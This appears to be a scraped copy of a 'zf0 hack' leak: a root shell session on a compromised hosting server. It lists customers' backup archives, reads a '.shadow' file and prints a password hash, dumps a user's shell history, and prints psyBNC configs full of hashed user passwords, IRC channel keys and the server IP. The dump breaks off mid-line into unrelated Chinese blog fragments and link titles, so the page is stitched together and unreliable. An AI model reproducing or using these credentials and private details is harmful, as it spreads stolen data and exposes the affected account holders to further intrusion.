drwxr-xr-x 2 admin admin             4096 Dec 30 16:49 .
drwxr-xr-x 6 admin admin             4096 Feb  1 03:03 ..
-rw-r----- 1 admin felosi           11560 Sep 14  2007 admin.admin.felosi.tar.gz
-rw-r----- 1 admin admin      11404750600 Dec 18 21:28 admin.root.admin.tar.gz
-rw-r----- 1 admin admin         35395367 Aug 11  2007 reseller.admin.aaatrans.tar.gz
-rw-r----- 1 admin        535  2166835881 Sep 14  2007 reseller.admin.bwhost.tar.gz
-rw-r----- 1 admin        503       27875 Sep 14  2007 reseller.admin.llythexic.tar.gz
-rw-r----- 1 admin        549     8597301 Sep 14  2007 reseller.felosi.brinkhos.tar.gz
-rw-r----- 1 admin        552     5638521 Sep 14  2007 reseller.felosi.burn.tar.gz
-rw-r----- 1 admin alliancedn      264984 Dec 30 16:29 user.admin.alliancedn.tar.gz
-rw-r----- 1 admin aosw         541773752 Sep 14  2007 user.admin.aosw.tar.gz
-rw-r----- 1 admin        532    28274761 Sep 14  2007 user.admin.aryan88.tar.gz
-rw-r----- 1 admin        538   518730829 Dec 30 16:29 user.admin.asbestos.tar.gz
-rw-r----- 1 admin barnseo       16041617 Dec 18 21:29 user.admin.barnseo.tar.gz
-rw-r----- 1 admin bnc            2082640 Dec 30 16:29 user.admin.bnc.tar.gz
-rw-r----- 1 admin bored          3830711 Dec 18 21:29 user.admin.bored.tar.gz
-rw-r----- 1 admin churc0         4341166 Dec 18 21:29 user.admin.churc0.tar.gz
-rw-r----- 1 admin connors         652449 Dec 18 21:29 user.admin.connors.tar.gz
-rw-r----- 1 admin dougie      5454961654 Dec 30 16:37 user.admin.dougie.tar.gz
-rw-r----- 1 admin        558    20340587 Dec 18 21:37 user.admin.earn.tar.gz
-rw-r----- 1 admin egg            5530647 Dec 30 16:37 user.admin.egg.tar.gz
-rw-r----- 1 admin every        323268270 Dec 30 16:37 user.admin.every.tar.gz
-rw-r----- 1 admin evilcode    1607382248 Dec 30 16:40 user.admin.evilcode.tar.gz
-rw-r----- 1 admin excodeirc    113123361 Dec 30 16:41 user.admin.excodeirc.tar.gz
-rw-r----- 1 admin exploiterc   273460363 Dec 18 21:43 user.admin.exploiterc.tar.gz
-rw-r----- 1 admin felosii         202367 Dec 18 21:43 user.admin.felosii.tar.gz
-rw-r----- 1 admin g00ns83     1922138751 Dec 30 16:44 user.admin.g00ns83.tar.gz
-rw-r----- 1 admin g00nsts395     5616214 Dec 30 16:44 user.admin.g00nsts395.tar.gz
-rw-r----- 1 admin grumpy       207859624 Dec 30 16:44 user.admin.grumpy.tar.gz
-rw-r----- 1 admin        516      988823 Sep 14  2007 user.admin.hackersd.tar.gz
-rw-r----- 1 admin hackrad      371198425 Dec 30 16:45 user.admin.hackrad.tar.gz
-rw-r----- 1 admin        517     2334763 Dec 18 21:48 user.admin.high.tar.gz
-rw-r----- 1 admin illmob       593721185 Dec 30 16:46 user.admin.illmob.tar.gz
-rw-r----- 1 admin        519   104101941 Dec 18 21:49 user.admin.leetmach.tar.gz
-rw-r----- 1 admin mycorp          147245 Dec 30 16:46 user.admin.mycorp.tar.gz
-rw-r----- 1 admin partyvan     327144959 Dec 30 16:46 user.admin.partyvan.tar.gz
-rw-r----- 1 admin pingyill      30825336 Dec 30 16:47 user.admin.pingyill.tar.gz
-rw-r----- 1 admin ragedns      189555066 Dec 30 16:47 user.admin.ragedns.tar.gz
-rw-r----- 1 admin rageserver      255007 Dec 30 16:47 user.admin.rageserver.tar.gz
-rw-r----- 1 admin robo            290786 Dec 30 16:47 user.admin.robo.tar.gz
-rw-r----- 1 admin shoutcas     385370416 Dec 30 16:48 user.admin.shoutcas.tar.gz
-rw-r----- 1 admin sn00g3s      269230557 Dec 30 16:49 user.admin.sn00g3s.tar.gz
-rw-r----- 1 admin        524  1468386072 Sep 14  2007 user.admin.vg114.tar.gz
-rw-r----- 1 admin void             14594 Dec 30 16:49 user.admin.void.tar.gz
-rw-r----- 1 admin        548    75815612 Sep 14  2007 user.admin.yourgift.tar.gz
-rw-r----- 1 admin        551      626926 Sep 14  2007 user.brinkhos.bayw.tar.gz
-rw-r----- 1 admin        555       30546 Sep 14  2007 user.burn.kid652.tar.gz
-rw-r----- 1 admin        553       27271 Sep 14  2007 user.burn.lucasl123.tar.gz
-rw-r----- 1 admin        554       24648 Sep 14  2007 user.burn.rsuchow.tar.gz
-rw-r----- 1 admin        533   308158933 Sep 14  2007 user.bwhost.assault.tar.gz
-rw-r----- 1 admin        526     4716486 Sep 14  2007 user.bwhost.ballardt.tar.gz
-rw-r----- 1 admin        527   175245944 Sep 14  2007 user.bwhost.darkstorm.tar.gz
-rw-r----- 1 admin        528      597461 Sep 14  2007 user.bwhost.mffclan.tar.gz
-rw-r----- 1 admin        529   540182805 Sep 14  2007 user.bwhost.squad.tar.gz
-rw-r----- 1 admin        530      903208 Sep 14  2007 user.bwhost.tnpreacher.tar.gz
-rw-r----- 1 admin        531    71751894 Sep 14  2007 user.bwhost.xlostboyx.tar.gz
-rw-r----- 1 admin        550     8486403 Sep 14  2007 user.felosi.prox.tar.gz
[root@demon2 admin]# ls -al backups
total 8
drwx------  2 admin admin 4096 Aug  1  2007 .
drwx--x--x 17 admin admin 4096 Feb 11 22:44 ..
[root@demon2 admin]# cat .shadow 
$1$k67PPtsg$vReIxhUQshkQHrgN8qop4/
[root@demon2 admin]# cd ../bnc
[root@demon2 bnc]# ls -al
total 364
drwx--x--x  6 bnc  bnc    4096 Aug  8  2007 .
drwx--x--x 50 root root   4096 Mar 27 16:19 ..
-rw-------  1 bnc  bnc    6018 Apr 19 20:31 .bash_history
-rw-r--r--  1 bnc  bnc      24 Aug  3  2007 .bash_logout
-rw-r--r--  1 bnc  bnc     176 Aug  3  2007 .bash_profile
-rw-r--r--  1 bnc  bnc     124 Aug  3  2007 .bashrc
drwx--x--x  3 bnc  bnc    4096 Aug  3  2007 domains
drwxrwx---  3 bnc  mail   4096 Aug  3  2007 imap
drwx------  2 bnc  bnc    4096 Aug  3  2007 mail
drwxr-xr-x 12 bnc  bnc    4096 Apr 20 23:41 psybnc
-rw-rw-r--  1 bnc  bnc  311715 Jun  4  2005 psyBNC-2.3.2-7.tar.gz
lrwxrwxrwx  1 bnc  bnc      35 Aug  3  2007 public_html -> ./domains/bnc.g00ns.net/public_html
-rw-r-----  1 bnc  mail     34 Aug  3  2007 .shadow
[root@demon2 bnc]# cat .bash_history 
cat
ls
ls public_html
cd public_html/
ls
nano index.html
cd $home
ls
mkdir bnc1
cd bnc1
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make menuconfig
./psybnc
./Psybnc
ls
make
./psybnc
./psybnc stop
ps -aux
kill 26364
ls
ps -aux
kill 26364
ls
ps -aux
kill 26364
ps -aux
ls
nano psybnc.conf
./psybnc
ps -aux
w
who
users
kill 26364
kill 26364
kill -i 26364
kill -9  26364
ps -au
ps -aux
cd $home
ls
rm -rf bnc1
users
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar zxvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls -al
make menuconfig
make menuconfig
make
./psybnc
ps =aux
ps
ps -a
ps -A
kill -9 3365
kill 3365
cd psybnc/
ls
pico psybnc.conf
text psybnc.conf
psybnc.conf
nano psybnc.conf
nano psybnc.conf
./[sybnc
./psybnc
w
ls
cd psybnc
ls
nano psybnc.conf
nano psybnc.conf
makesalt
./makesalt 
cd tools
ls
cd ..
ls
cd scripts
ls
cd example/
ls
cd ..
cd ..
ls
cd help
ls
cat ADDUSER.TXT
cd ..
ls
nano psybnc.conf
ls
cd log
ls
cat psybnc.log
cat psybnc.log
cat psybnc.log
cat psybnc.log
cat psybnc.log
cd ..
ls
nano psybnc.conf
nano psybnc.conf
cd log
cat log
cat psybnc.log
cat psybnc.log
cat psybnc.log
cd ..
ls
cd ..
ls
ps -aux
kill 4414
ps -aux
kill 4414
ps -aux
ls
rm -rf psybnc
ps -aux
kill 4414
ps -aux
tar -zxvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc
ls
make menuconfig
ls
make
ls
./psybnc
nano psybnc.conf
ps -aux
ps -aux
ls
rm -rf psybnc.pid
kill 1463
ps -aux
ls
kill 1463
ls
ps -aux
./psybnc restart
./psybnc psybnc.conf
ps -aux
kill 1463
ps -aux
ls
killall 1463
kill 1463
killall psybnc
ps -aux
kill -9 1463
ps -aux
./psybnc
ps -aux
kill -9 2455
ps -aux
nano psybnc.conf
nano psybnc.conf
./psybnc
cd log
nano log
ls
cat psybnc.log
cd ..
ls
nano psybnc.conf
cd ..
ls
rm -rf psybnc
tar zxvf psyBNC-2.3.2-7.tar.gz 
ps -aux
kill -9 2558
cd psybnc
ls
make
ps -aux
nano psybnc.conf
nano psybnc.conf
./psybnc
cd psybnc
nano psybnc.conf
cp psybnc.conf psybnc.1.conf
ls
cd psybnc
ls
cp psybnc.conf psybnc.1.conf
nano psybnc.1.conf
nano psybnc.1.conf
nano psybnc.1.conf
echo "" > psybnc.1.conf
nano psybnc.1.conf
./psybnc psybnc.1.conf
cd psybnc
ls
nano psybncchk 
crontab -e
crontab -e
crontab -e
pwd
crontab -e
nano psybncchk
nano psybncchk
nano psybncchk
ps -aux
ps -aux
cd psybnc
cd log
ls
cat psybnc.log
cat psybnc.log
ls
cat USER1.TRL
cat USER2.TRL
cat USER3.LOG
cd ..
ls
cat psybnc.conf
cd log
cat psybnc.log
ls
cd ..
ls
nano psybnc.conf
nano psybnc.conf
nano psybnc.1.conf
nano psybnc.conf
cd tools
ls
cd ..
ls
cd key
ls
cd ..
ls
nano psybnc.1.conf
cd log
ls
cat psybnc.log
cd ..
ls
ps -aux
kill -9 3514
ps -aux
./psybnc psybnc.conf
ls
cd psybnc
ls
nano psybnc.1.conf
nano psybnc.1.conf
grep -rn 'version' *
ps -aux
nano psybnc.1.conf
nano psybnc.conf
nano psybnc.1.conf
nano psybnc.1.conf
nano psybnc.1.conf
nano psybnc.1.conf
exit
crontab
crontab -h
crontab -l
ls
cd psybnc
ls
cp psybnc.1.conf psybnc.gso.conf
nano psybnc.gso.conf
nano psybnc.conf
nano psybnc.conf
nano psybnc.gso.conf
./psybnc psybnc.gso.conf 
ls
cd psybnc
ls
cat psybnc.conf
cd psybnc/
ls
nano psybnc.gso.conf
nano psybnc.conf
ls
w
who
users
ls psybnc
ls domains
ls public_html/
ps -aux
uptime
uname -a
ls
cd psybnc/
ls
mkdir probebnc
ls
cd probebnc
ls
ls
wget http://psybnc.info/download/psyBNC-2.3.2-7.tar.gz
tar -zxvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc/
ls
./install
./setup
ls menuconf/
ls
cd $user
ls
cd psybnc
ls
rm -rf probebnc/
ps -aux
mkdir probe
ls
cd probe
ls
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
tar -zxvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc/
ls
./install
./setup
./psybncchk 
cd $user
ls
cd psybnc/
ls
rm -rf probe
ls
mkdir probe
cd probe
ls
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
tar -xzvf psyBNC2.3.1.tar.gz
ls
tar -xzvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc/
ls
nano config.h
make menuconfig
make
make menuconf
make menuconfig
ls
nano psybnc.conf
rm *
ls
rm -rf *
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
ls
cd $user
ls
cd psybnc/
ls
cd probe/
ls
rm -rf psybnc/
ls
tar -xzvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc/
ls
nano config.h
make menuconfig
make
ls
cd $user/psybnc/probe
cd $user
ls
cd psybnc/
ls
cd probe/
ls
rm -rf psybnc/
tar -xzvf psyBNC-2.3.2-7.tar.gz 
ls
cd psybnc/
ls
make menuconfig
make
ls
./psybnc
cd
ps ax
kill -9 9128 12320 24226 28825
cd psybnc
ps ax
./psybnc psybnc.1.conf
./psybnc
./psybnc psybnc.gso.conf
cd
ls
exit
ls
cd psybnc
ls
head psybnc.1.conf
head psybnc.gso.conf
./psybnc psybnc.gso.conf
ps -aiux
ps -aux
ps -aux
kill 21054
kill -9 21054
./psybnc psybnc.gso.conf
ls
cd psy
cd psybnc/
ls
cd probe/
ls
cd psybnc/
ls
./psybnc
ps -aux
ls
nano psybnc.conf
nano psybnc.conf
nano psybnc.conf.old 
nano config.h
nano psybnc.conf
nano log/psybnc.log
cd $user
ls
cd psybnc/
ls
cd probe
ls
rm -rf psybnc/
tar xzf psyBNC-2.3.2-7.tar.gz 
ls
cd psy
cd psybnc
ls
./psybncchk 
nano config.h
ls
nano REa
nano README 
make menuconfig
make
ls
./psybnc
ps ax
kill 1536
ls
ps ax
kill 9672
ps ax
kill 9672
ps axc
ps ax
ls
./psybnc  psybnc.gso.conf
ps ax
kill 1536
ps ax
kill -s 1536
kill -9 9672
ps ax
kill -9 1536
ps ax
ls
./psybnc  psybnc.gso.conf
ps ax
ps ax
kill -9 21041
ps ax
kill -9 21047
ps ax
kill -9 24942
ps ax
ls
./psybnc psybnc.1.conf
ps ax
ls
./psybnc psybnc.gso.conf 
ps ax
kill -9 ./psybnc psybnc.1.conf
kill -9 25484
kill -9 25512
ps ax
ls
./psybnc
cd help
ls
cd ..
ls
ps ax
./psybnc psybnc.1.conf
./psybnc
./psybnc psybnc.gso.conf 
ps ax
ls
cd psybnc
ls
head psybnc.conf
head psybnc.1.conf
ls
cat psybnc.gso.conf
head psybnc.gso.conf
psybnc psybnc.gso.conf
ls
./psybnc psybnc.gso.conf
ls
cd psybnc
ls
head psybnc.gso.con
head psybnc.gso.conf
psybnc psybnc.gso.conf
./psybnc psybnc.gso.conf
ls
cd psybnc
ls
head psybnc.gso.conf
psybnc psybnc.gso.conf
./psybnc psybnc.gso.conf
ps -aux
kill -9 17551
ps -aux
./psybnc psybnc.gso.conf
ps -aux
ps -aux
who
last
ps -aux
head psybnc.gso.conf
cd psybnc
head psybnc.gso.conf
ls
head psybnc.conf
netstat | grep listen
netstat
kill -9 31328
./psybnc psybnc.gso.conf
ls
cd psybnc
ls
cat psybnc.gso.conf
ls
cd psybnc/
ls
cat psybnc.gso.conf
[root@demon2 bnc]# cd psybnc
[root@demon2 psybnc]# ls
CHANGES   log           psybnc             psybnc.gso.conf.old  targets.mak
config.h  Makefile      psybnc.1.conf      psybnc.pid           TODO
COPYING   makefile.out  psybnc.1.conf.old  README               tools
FAQ       makesalt      psybncchk          salt.h
help      menuconf      psybnc.conf        SCRIPTING
key       motd          psybnc.conf.old    scripts
lang      probe         psybnc.gso.conf    src
[root@demon2 psybnc]# cat psybnc.1.conf
PSYBNC.SYSTEM.PORT1=11474
PSYBNC.SYSTEM.HOST1=72.20.26.209
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=admin
USER1.USER.USER=FiSh
USER1.USER.PASS==1h1K'Z`U`B'810'='T
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=0
USER1.USER.DCCENABLED=1
USER1.USER.AUTOGETDCC=0
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.CERT=+
USER1.USER.VHOST=g00ns.net
USER1.USER.LEAVEMSG=afk
USER1.USER.AWAYNICK=FiSh|bnc
USER1.USER.NICK=FiSh
USER1.SERVERS.SERVER1=S=irc.g00ns.net
USER1.SERVERS.PORT1=6601
USER1.CHANNELS.ENTRY3=#13337
USER1.CHANNELS.ENTRY6=#help
USER1.CHANNELS.ENTRY8=#notgay
USER1.CHANNELS.ENTRY1=#g00nspriv8
USER1.CHANNELS.ENTRY4=#batcave
USER1.CHANNELS.KEY4=+1I271$28262u2A2U2U
USER1.CHANNELS.ENTRY7=#exploitercode
USER1.CHANNELS.ENTRY12=#s3x
USER1.CHANNELS.KEY12=+1W202824
USER1.CHANNELS.ENTRY5=#g00ns
USER1.CHANNELS.ENTRY0=#illmob
USER1.CHANNELS.ENTRY2=#private
USER1.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A
USER1.CHANNELS.ENTRY9=#exopers
USER1.CHANNELS.ENTRY10=#irclogs
USER1.CHANNELS.KEY1=+1G2i2c2j2j2p2@
USER2.USER.LOGIN=sCuZz
USER2.USER.USER=sCuZz
USER2.USER.PASS=='R1n1b`W1B031K`=`O
USER2.USER.RIGHTS=0
USER2.USER.VLINK=0
USER2.USER.PPORT=0
USER2.USER.PARENT=0
USER2.USER.QUITTED=0
USER2.USER.DCCENABLED=1
USER2.USER.AUTOGETDCC=0
USER2.USER.AIDLE=0
USER2.USER.LEAVEQUIT=0
USER2.USER.AUTOREJOIN=1
USER2.USER.SYSMSG=1
USER2.USER.LASTLOG=0
USER2.USER.CERT=+
USER2.USER.VHOST=g00ns.net
USER2.USER.NICK=sCuZz
USER2.SERVERS.SERVER1=irc.g00ns.net
USER2.SERVERS.PORT1=6667
USER2.CHANNELS.ENTRY2=#private
USER2.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A
USER2.CHANNELS.ENTRY1=#batcave
USER2.CHANNELS.KEY1=+1I271$28262u2A2U2U
USER2.CHANNELS.ENTRY0=#g00ns
USER3.USER.LOGIN=giovanni
USER3.USER.USER=katalyst
USER3.USER.PASS=='E13`h0v0V`H1u0A'f
USER3.USER.RIGHTS=0
USER3.USER.VLINK=0
USER3.USER.PPORT=0
USER3.USER.PARENT=0
USER3.USER.QUITTED=0
USER3.USER.DCCENABLED=1
USER3.USER.AUTOGETDCC=0
USER3.USER.AIDLE=0
USER3.USER.LEAVEQUIT=0
USER3.USER.AUTOREJOIN=1
USER3.USER.SYSMSG=1
USER3.USER.LASTLOG=0
USER3.USER.CERT=+
USER3.USER.VHOST=g00ns.net
USER3.USER.NICK=giovanni
USER3.SERVERS.SERVER1=S=irc.g00ns.net
USER3.SERVERS.PORT1=6601
USER3.CHANNELS.ENTRY3=#seminar
USER3.CHANNELS.ENTRY0=#g00ns
USER3.CHANNELS.ENTRY1=#illmob
USER3.CHANNELS.ENTRY4=#13337
USER1.LGI.ENTRY1=FiSh;#private
USER1.LGI.ENTRY0=FiSh;#g00ns
USER4.USER.LOGIN=sick
USER4.USER.USER=sick
USER4.USER.PASS=='t'L0Q'F'q'b16'o`a
USER4.USER.RIGHTS=0
USER4.USER.VLINK=0
USER4.USER.PPORT=0
USER4.USER.PARENT=0
USER4.USER.QUITTED=0
USER4.USER.DCCENABLED=1
USER4.USER.AUTOGETDCC=0
USER4.USER.AIDLE=0
USER4.USER.LEAVEQUIT=0
USER4.USER.AUTOREJOIN=1
USER4.USER.SYSMSG=1
USER4.USER.LASTLOG=0
USER4.USER.CERT=+
USER4.USER.VHOST=g00ns.net
USER4.USER.NICK=sick
USER4.SERVERS.SERVER1=addserver s=irc.g00ns.net
USER4.SERVERS.PORT2=6661
USER4.SERVERS.SERVER2=addserver irc.g00ns.net
USER4.SERVERS.PORT3=6601
USER4.SERVERS.SERVER3=addserver addserver S=irc.g00ns.net
USER4.SERVERS.PORT4=6601
USER4.SERVERS.SERVER4=addserver S=irc.g00ns.net
USER4.SERVERS.PORT5=6601
USER4.SERVERS.SERVER5=s=irc.g00ns.net
USER4.SERVERS.PORT6=6601
USER4.SERVERS.SERVER6=s=irc.g00ns.net
USER4.SERVERS.PORT1=6601
[root@demon2 psybnc]# cat psybnc.conf
PSYBNC.SYSTEM.PORT1=11473
PSYBNC.SYSTEM.HOST1=72.20.26.209
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=admin
USER1.USER.USER=FiSh
USER1.USER.PASS==1h1K'Z`U`B'810'='T
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=1
USER1.USER.DCCENABLED=1
USER1.USER.AUTOGETDCC=0
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.CERT=+
USER1.USER.VHOST=72.20.26.209
USER1.USER.NICK=_FiSh
USER2.USER.LOGIN=FiSh
USER2.USER.USER=FiSh
USER2.USER.PASS==0v0'01'T'q0='l`O'f
USER2.USER.RIGHTS=0
USER2.USER.VLINK=0
USER2.USER.PPORT=0
USER2.USER.PARENT=0
USER2.USER.QUITTED=0
USER2.USER.DCCENABLED=1
USER2.USER.AUTOGETDCC=0
USER2.USER.AIDLE=0
USER2.USER.LEAVEQUIT=0
USER2.USER.AUTOREJOIN=1
USER2.USER.SYSMSG=1
USER2.USER.LASTLOG=0
USER2.USER.CERT=+
USER2.USER.NICK=FiSh
USER3.USER.LOGIN=pr0be
USER3.USER.USER=pr0be
USER3.USER.PASS==1G0$0u10`N`C0B`X'`
USER3.USER.RIGHTS=0
USER3.USER.VLINK=0
USER3.USER.PPORT=0
USER3.USER.PARENT=0
USER3.USER.QUITTED=0
USER3.USER.DCCENABLED=1
USER3.USER.AUTOGETDCC=0
USER3.USER.AIDLE=0
USER3.USER.LEAVEQUIT=0
USER3.USER.AUTOREJOIN=1
USER3.USER.SYSMSG=1
USER3.USER.LASTLOG=0
USER3.USER.CERT=+
USER3.USER.VHOST=g00ns.net
USER3.USER.AWAY=|a|f|k
USER3.USER.NICK=pr0be
USER3.SERVERS.SERVER1=irc.g00ns.net
USER3.SERVERS.PORT2=6667
USER3.SERVERS.SERVER2=irc.g00ns.net
USER3.SERVERS.PORT3=6601
USER3.SERVERS.SERVER3=S=irc.g00ns.net
USER3.SERVERS.PORT1=6667
USER1.SERVERS.SERVER1=S=irc.g00ns.net
USER1.SERVERS.PORT1=6601
USER1.CHANNELS.ENTRY1=#g00ns
USER1.CHANNELS.ENTRY2=#13337
USER1.CHANNELS.ENTRY3=#40z
USER1.CHANNELS.KEY3=+1H2i262j2c2s2R2Y
USER1.CHANNELS.ENTRY4=#private
USER1.CHANNELS.KEY4=+1H2i25202i2j2A2M2E3125
USER1.CHANNELS.ENTRY5=#seminar
USER1.CHANNELS.ENTRY7=#help
USER4.USER.LOGIN=SyNiCaL
USER4.USER.USER=SyNiCaL
USER4.USER.PASS==0G'11d`h1G121n0G`'
USER4.USER.RIGHTS=0
USER4.USER.VLINK=0
USER4.USER.PPORT=0
USER4.USER.PARENT=0
USER4.USER.QUITTED=0
USER4.USER.DCCENABLED=1
USER4.USER.AUTOGETDCC=0
USER4.USER.AIDLE=0
USER4.USER.LEAVEQUIT=0
USER4.USER.AUTOREJOIN=1
USER4.USER.SYSMSG=1
USER4.USER.LASTLOG=0
USER4.USER.CERT=+
USER4.USER.VHOST=g00ns.net
USER4.USER.NICK=SyNiCaL
USER3.CHANNELS.ENTRY2=#40z
USER3.CHANNELS.KEY2=+1H2i262j2c2s2R2Y
USER3.CHANNELS.ENTRY5=#wboard
USER3.CHANNELS.ENTRY7=#exploitercode
USER3.CHANNELS.ENTRY3=#vBTEAM
USER3.CHANNELS.ENTRY6=#BlackIRC
USER3.CHANNELS.ENTRY8=#slavehack
USER4.SERVERS.SERVER1=irc.g00ns.net
USER4.SERVERS.PORT1=6667
USER4.CHANNELS.ENTRY3=#sizzurp
USER4.CHANNELS.ENTRY4=#13337
[root@demon2 psybnc]# cat psybnc.gso.conf
PSYBNC.SYSTEM.PORT1=11475
PSYBNC.SYSTEM.HOST1=72.20.26.209
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=admin
USER1.USER.USER=Genocide
USER1.USER.PASS==1h1K'Z`U`B'810'='T
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=0
USER1.USER.DCCENABLED=1
USER1.USER.AUTOGETDCC=0
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.CERT=+
USER1.USER.VHOST=72.20.26.209
USER1.USER.LEAVEMSG=afk
USER1.USER.NICK=Genocide
USER1.SERVERS.PORT2=6667
USER1.SERVERS.PORT1=7001
USER1.SERVERS.SERVER1=S=irc.evilcoders.net
USER1.SERVERS.SERVER2=irc.g00ns.net
USER2.USER.LOGIN=sCuZz
USER2.USER.USER=sCuZz
USER2.USER.PASS=='q0N1q070I`I`O'W'y
USER2.USER.RIGHTS=0
USER2.USER.VLINK=0
USER2.USER.PPORT=0
USER2.USER.PARENT=0
USER2.USER.QUITTED=0
USER2.USER.DCCENABLED=1
USER2.USER.AUTOGETDCC=0
USER2.USER.AIDLE=0
USER2.USER.LEAVEQUIT=0
USER2.USER.AUTOREJOIN=1
USER2.USER.SYSMSG=1
USER2.USER.LASTLOG=0
USER2.USER.CERT=+
USER2.USER.VHOST=g00ns.net
USER2.USER.NICK=sCuZz
USER1.CHANNELS.ENTRY1=#s3x
USER1.CHANNELS.KEY1=+1W202824
USER1.CHANNELS.ENTRY3=#batcave
USER1.CHANNELS.KEY3=+1I271$28262u2A2U2U
USER1.CHANNELS.ENTRY7=#exopers
USER1.CHANNELS.ENTRY4=#notgay
USER1.CHANNELS.ENTRY9=#illmob
USER1.CHANNELS.KEY9=+1e2a1X2f2f2l1P2y2R
USER1.CHANNELS.ENTRY11=#t3st
USER1.CHANNELS.ENTRY10=#hightechhost
USER1.CHANNELS.ENTRY6=#420
USER1.CHANNELS.ENTRY2=#spk
USER1.CHANNELS.ENTRY0=#g00ns
USER2.SERVERS.SERVER1=irc.partyvan.fm
USER2.SERVERS.PORT1=6667
USER2.CHANNELS.ENTRY1=#420
USER2.CHANNELS.ENTRY2=#private
USER2.CHANNELS.KEY2=+1S282026242B2U2Q2F362@3B
USER2.CHANNELS.ENTRY3=#batcave
USER2.CHANNELS.ENTRY0=#g00ns
[root@demon2 psybnc]# cd log
[root@demon2 log]# ls
INFO            USER1.LOG.old  USER2.LOG.old  USER3.TRL      USER4.TRL
psybnc.log      USER1.TRL      USER2.TRL      USER4.LOG      USER5.TRL
psybnc.log.old  USER2.LOG      USER3.LOG.old  USER4.LOG.old  USER6.TRL
[root@demon2 log]# cat psybnc.log
Sat Apr 19 15:06:18 :Listener created :72.20.26.209 port 11475
Sat Apr 19 15:06:18 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :14297)
Sat Apr 19 15:06:18 :SSL initialized
Sat Apr 19 15:06:18 :Loading all Users..
Sat Apr 19 15:06:23 :connect from 78.129.174.155
Sat Apr 19 15:06:23 :User admin () trying irc.evilcoders.net port 7001 (72.20.26.209).
Sat Apr 19 15:06:23 :User admin () connected to S=irc.evilcoders.net:7001 (72.20.26.209)
Sat Apr 19 15:06:23 :User admin got disconnected from server.
Sat Apr 19 15:06:31 :User ad
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

zf0 hack 的相关文章

随机推荐

  • js+mysql实现论坛回复功能_php实现简单BBS论坛及回复

    实例简介 该资源主要参考http blog csdn net eastmount article details 44241583文章 讲述了如何通过PHP实现论坛搭建简单的效果 同时包括IFrame实现局部布局 后台数据库通过SAE搭建
  • 2022年 软件工程专业 计算机组成原理 运算器实验报告

    年级 班号 组号 学号 专业 软件工程 日期 2022 年 5 月 11日 姓名 预判你的代码 实验名称 运算器 实验室 实验 目的 或 要求 1 了解运算器的组成结构 2 掌握运算器的工作原理 3 熟悉运算器的设计方法 4 掌握运算器的控
  • AndroidManifest.xml文件综合详解

    http www cnblogs com hnrainll archive 2011 10 26 2225710 html 一 重要性AndroidManifest xml是Android应用程序中最重要的文件之一 它是Android程序的
  • Zend Studio 12 安装及破解

    1 安装 1 1 下载最新版本Zend Studio 12 0 0 http downloads zend com studio eclipse 12 0 0 ZendStudio 12 0 0 win32 win32 x86 msi 12
  • Android10填坑适配指南,实际经验代码,拒绝翻译

    Android10填坑适配指南 包含实际经验代码 绝不照搬翻译文档 1 Region Op相关异常 java lang IllegalArgumentException Invalid Region Op only INTERSECT an
  • 2021年南京天印中学高考成绩查询,2021年南京高中录取分数线是多少及高中排名榜...

    2020年南京的高中录取分数线都已经公布 以下是小编给大家整理的汇总信息 仅供参考 一 2020年南京高中录取分数线是多少 一 科技特长生 学科特长生 科技特长生和学科特长生投档控制线均为548分 二 普通高中指标生 原市区普通高中指标生录
  • STM32——超声波模块

    模块介绍 超声波模块一般使用的都是HC SR04来进行测距 1 产品特点 HC SR04 超声波测距模块可提供 2cm 400cm 的非接触式距离感测功能 测 距精度可达高到的非接触式距离感测功能 测距精度可达高到 3mm 模块包括超声波发
  • 期货用期权对冲(期货用期权对冲吗)

    怎么用期权 option 做对冲 hedge 在期权交易市场中 对冲期权风险可以通过交易不同的合约方向 使用组合策略对自己合约盈利或者合约的亏损进行一个风险对冲 这样可以降低期权交易市场中的风险 在期权交易市场中 投资者一般也会将期权用作对
  • Java 静态变量,静态方法,静态常量简介说明

    转自 Java 静态变量 静态方法 静态常量简介说明 下文笔者将着重讲述静态的相关说明 如下所示 实现思路 当我们在方法 变量 常量前面加上static关键字 则可认为其是一个静态的对象 静态方法注意事项 静态方法不可以使用this关键字
  • 去AV片马赛克,开发者被抓了

